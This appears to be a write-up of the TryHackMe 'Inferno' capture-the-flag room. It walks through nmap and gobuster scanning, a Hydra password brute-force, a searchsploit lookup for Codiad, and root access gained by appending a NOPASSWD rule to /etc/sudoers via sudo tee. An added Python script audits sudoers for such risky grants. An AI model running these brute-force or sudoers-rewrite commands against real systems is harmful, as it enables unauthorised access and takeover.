TryHackMe: Inferno
Today we will take a look at TryHackMe: Inferno. Please try to understand each step and take notes. Work quickly but carefully, because demons will often take you out ;)

Information Gathering
> Image analysis
view-source:http://10.10.223.163/1.jpg
First of all, let's download the image and search through it.

We found the name Dante. Note it down for later.
Enumeration/Scanning
> Nmap
sudo nmap -sS -sC -sV -oN nmap/initial 10.10.223.163
We found many open ports

I think this is a scam.
> Gobuster
gobuster dir -u http://10.10.223.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

But when we enter the site, we encounter authentication.

Time to bring in Hydra.
Exploitation
Let's attack with Hydra. For the username list, I will use the default-credential names admin and root alongside the dante we found earlier.
Command: hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 10.10.39.231 http-get /i****** -V -I -t 64
And here's the password, one we could have found just by guessing :)
Admin panel

Log in with the same username and password.
> Get reverse shell
The admin panel is Codiad. Let's look for an exploit.
Command: searchsploit codiad
Command: searchsploit -m multiple/webapps/50474.txt

But I wanted to do it through the admin panel.

> Get reverse shell

If we search inside, we see an interesting .dat file in the downloads folder.
Command: ls -la *

I saw it was hex and turned it into text.

> We found the username and password. Try to log in over SSH.

You are racing against time while working on this machine, because demons will take you out. Think and decide as quickly as possible.
List the commands we are allowed to run with sudo.
Command: sudo -l
We can run tee with sudo.
Command: echo "ALL ALL=NOPASSWD: ALL" | sudo tee -a /etc/sudoers
Privilege escalation

And now we are root.
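
The escalation works because tee run through sudo writes any file as root, so a single appended line rewrites the sudo policy itself. As an added example (not part of the original write-up), this Python audit flags sudoers rules of that kind; the sample file, the user names appuser and backup, and the FILE_WRITERS list are constructed assumptions.

```python
import os
import re

# Programs that can write arbitrary files when run as root (assumed, non-exhaustive).
FILE_WRITERS = {"tee", "cp", "mv", "dd", "sed", "install"}

# Constructed sample policy, not taken from the room.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root ALL=(ALL:ALL) ALL
appuser ALL=(root) NOPASSWD: /usr/bin/tee
backup ALL=(root) /usr/bin/rsync, /bin/cp
ALL ALL=NOPASSWD: ALL
"""

SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?P<spec>.+)$")


def audit_sudoers(text):
    """Return (line, who, issue, nopasswd) for each risky user specification."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        # Simplification: everything after '#' is dropped, so #include lines are ignored.
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP):
            continue
        m = RULE.match(line)
        if not m:
            continue
        spec = re.sub(r"\([^)]*\)", "", m["spec"])   # drop (runas) lists
        nopasswd = "NOPASSWD:" in spec
        spec = re.sub(r"\b[A-Z_]+:", "", spec)        # drop tags such as NOPASSWD:
        for cmd in (c.strip() for c in spec.split(",")):
            if not cmd:
                continue
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL" and m["who"] == "ALL":
                # Every account may run every command: the line appended via tee.
                findings.append((lineno, m["who"], "blanket-root", nopasswd))
            elif prog in FILE_WRITERS:
                # A root file write is enough to edit /etc/sudoers or /etc/passwd.
                findings.append((lineno, m["who"], "file-writer:" + prog, nopasswd))
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Run it against the output of `sudo cat /etc/sudoers` and each file under /etc/sudoers.d; any file-writer finding deserves the same scrutiny as a full ALL grant.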

"If you have any questions or comments, please do not hesitate to write. Have a good day."